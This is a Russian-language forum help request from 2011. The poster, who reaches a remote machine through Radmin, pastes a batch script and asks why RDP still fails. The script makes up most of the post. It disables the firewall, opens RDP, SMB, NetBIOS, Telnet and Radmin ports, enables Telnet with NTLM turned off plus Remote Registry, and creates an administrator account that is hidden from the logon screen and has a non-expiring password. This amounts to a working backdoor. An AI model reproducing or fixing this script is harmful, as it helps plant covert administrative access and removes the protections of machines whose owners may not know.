ElderWOLF
Junior Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Всем доброго времени суток. Есть такая задача, но никак решить немогу. Значит есть доступ на удалённый компьютер через Radmin. Через RDP не коннектится. Почему, понять немогу. Гуглил. Перебирал настройки. Всё впустую. Нацарапал батник (не судите строго ибо неведаю что творю.) Вот так сказать исходник. Посмотрите что не так. reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t reg_dword /d 0 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f > nul reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v "3389:TCP" /t REG_SZ /d "3389:TCP:LocalSubNet:Enabled:Remote Desktop" /f reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 3389:TCP /t reg_sz /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 139:TCP /t reg_sz /d 139:TCP"="139:TCP:*:Enabled:@xpsp2res.dll,-22004 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 445:TCP /t reg_sz /d 445:TCP:*:Enabled:@xpsp2res.dll,-22005 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 137:UDP /t reg_sz /d 137:UDP"="137:UDP:*:Enabled:@xpsp2res.dll,-22001 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 138:UDP /t reg_sz /d 138:UDP:*:Enabled:@xpsp2res.dll,-22002 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOp enPorts\List /v 23:TCP /t reg_sz /d 23:TCP"="23:TCP:*:Enabled:crimson /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 3389:TCP /t reg_sz /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 139:TCP /t reg_sz /d 139:TCP"="139:TCP:*:Enabled:@xpsp2res.dll,-22004 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 445:TCP /t reg_sz /d 445:TCP:*:Enabled:@xpsp2res.dll,-22005 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 137:UDP /t reg_sz /d 137:UDP"="137:UDP:*:Enabled:@xpsp2res.dll,-22001 /f reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 138:UDP /t reg_sz /d 138:UDP:*:Enabled:@xpsp2res.dll,-22002 /f > nul reg add HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpen Ports\List /v 23:TCP /t reg_sz /d 23:TCP"="23:TCP:*:Enabled:crimson /f > nul netsh firewall add portopening TCP 3389 RDP netsh firewall add portopening protocol = TCP port = 3389 name = TCP > nul netsh firewall add portopening protocol = TCP port = 4899 name = TCP > nul netsh firewall add portopening protocol = TCP port = 445 name = TCP > nul netsh firewall add portopening TCP 23 telnet enable reg add HKLM\SYSTEM\ControlSet001\Services\TlntSvr /v Start /t reg_dword /d 2 /F > nul reg add HKLM\SYSTEM\ControlSet001\Services\RemoteRegistry /v Start /t reg_dword /d 2 /F > nul reg add HKLM\SYSTEM\ControlSet001\Services\RemoteAccess /v Start /t reg_dword /d 2 /F > nul reg add HKLM\SYSTEM\ControlSet001\Services\RpcLocator /v Start /t reg_dword /d 2 /F > nul reg add HKLM\SYSTEM\ControlSet001\Services\RpcSs /v Start /t reg_dword /d 2 /F > nul sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet > nul net start "Terminal Server" > nul net start RemoteRegistry > nul net start RemoteAccess > nul net start RpcLocator > nul net start RpcSs > nul Set AdmGroupSID=S-1-5-32-544 Set AdmGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J Set AdmGroup=%AdmGroup:~0,-1% net user Login Password /add net localgroup %AdmGroup% Login /add Set RDPGroupSID=S-1-5-32-555 Set RDPGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J Set RDPGroup=%RDPGroup:~0,-1% net localgroup "%RDPGroup%" Login /add net accounts /maxpwage:unlimited net accounts /forcelogoff:no reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v Login /t reg_dword /d 00000000 /f > nul Учётку оно создаёт и всё как бы нормально, но самого соединения нет ро RDP | Всего записей: 46 | Зарегистр. 21-02-2011 | Отправлено: 04:02 06-03-2011 | Исправлено: ElderWOLF, 04:04 06-03-2011 |
|